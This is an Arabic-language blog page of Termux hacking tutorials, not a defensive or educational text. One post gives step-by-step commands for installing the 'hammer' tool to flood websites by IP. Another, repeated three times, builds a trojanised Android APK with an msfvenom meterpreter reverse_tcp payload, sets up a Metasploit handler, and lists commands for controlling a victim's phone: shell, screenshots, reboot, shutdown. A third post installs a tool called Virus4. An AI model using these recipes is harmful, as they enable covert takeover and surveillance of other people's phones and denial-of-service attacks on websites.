التخطي إلى المحتوى الرئيسي

المشاركات

تثبيت أداة hummer لضرب المواقع

الاوامر بالترتيب 1-pkg update 2-pkg install python 3-pkg install git 4-git clone https://github.com/cyweb/hammer 5-ls 6-cd hammer 7-ls 8-chmod 777 hammer 9-ls 10-python hammer.py python3 hammer.py-s(ipالموقع)
آخر المشاركات

عمل باليود ملغم بالميتاسبلويت

⚶ عمل باليود ملغم بالميتاسبلويت اولا عمل بايلود تطبيق apk ملغم msfvenom -p android/meterpreter/reverse_tcp LHOST=10.116.201.160 LPORT=4444 R > /sdcard/termux.apk ----------------------------------------------------------------- ثانيا امر فتح اداه MetaSploit ./msfconsole ----------------------------------------------------------------- ثالثا بعد الدخول علي اداه MetaSploit $ use exploit/multi/handler $ set payload android/meterpreter/reverse_tcp $ set lhost 10.118.171.194 $ set lport 4444 $ exploit $ help $ shell $ cd /sdcard $ ls ----------------------------------------------------------------- رابعا اوامر التحكم في الضحيه لأعادة تشغيل جهاز الضحية : reboot ------------------------------------------------------------ لاطفاء جهاز الضحية : shutdown ------------------------------------------------------------ لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo ------------------------------------------------------------ لألتقاط صورة من شاشة الضحية : screenshot ---------
⚶ عمل باليود ملغم بالميتاسبلويت اولا عمل بايلود تطبيق apk ملغم msfvenom -p android/meterpreter/reverse_tcp LHOST=10.116.201.160 LPORT=4444 R > /sdcard/termux.apk ----------------------------------------------------------------- ثانيا امر فتح اداه MetaSploit ./msfconsole ----------------------------------------------------------------- ثالثا بعد الدخول علي اداه MetaSploit $ use exploit/multi/handler $ set payload android/meterpreter/reverse_tcp $ set lhost 10.118.171.194 $ set lport 4444 $ exploit $ help $ shell $ cd /sdcard $ ls ----------------------------------------------------------------- رابعا اوامر التحكم في الضحيه لأعادة تشغيل جهاز الضحية : reboot ------------------------------------------------------------ لاطفاء جهاز الضحية : shutdown ------------------------------------------------------------ لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo ------------------------------------------------------------ لألتقاط صورة من شاشة الضحية : screenshot ---------
عمل باليود ملغم بالميتاسبلويت ⚶ عمل باليود ملغم بالميتاسبلويت اولا عمل بايلود تطبيق apk ملغم msfvenom -p android/meterpreter/reverse_tcp LHOST=10.116.201.160 LPORT=4444 R > /sdcard/termux.apk ----------------------------------------------------------------- ثانيا امر فتح اداه MetaSploit ./msfconsole ----------------------------------------------------------------- ثالثا بعد الدخول علي اداه MetaSploit $ use exploit/multi/handler $ set payload android/meterpreter/reverse_tcp $ set lhost 10.118.171.194 $ set lport 4444 $ exploit $ help $ shell $ cd /sdcard $ ls ----------------------------------------------------------------- رابعا اوامر التحكم في الضحيه لأعادة تشغيل جهاز الضحية : reboot ------------------------------------------------------------ لاطفاء جهاز الضحية : shutdown ------------------------------------------------------------ لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo ------------------------------------------------------------ لألتقاط صورة من شاشة

اداة payload6

تم تحديث اداة payload6  الى Virus4 من الاصدار رقم 2.5.1 الى الاصدار رقم 3.1.1 من مثبت الاداة من قبل يضغط 99 فقط  من ليس مثبتها  اوامر التثبيت هي  cd pkg install git -y  git clone https://github.com/Amerlaceset/Amer cd Amer  chmod +x * ./Amer.sh اوامر تشغيل الاداة  Virus4 Virus  bash Virus4.sh ./Virus4.sh لا تكتب sh Virus4.sh ماذا واجهتك بعض المشاكل اترك تعليق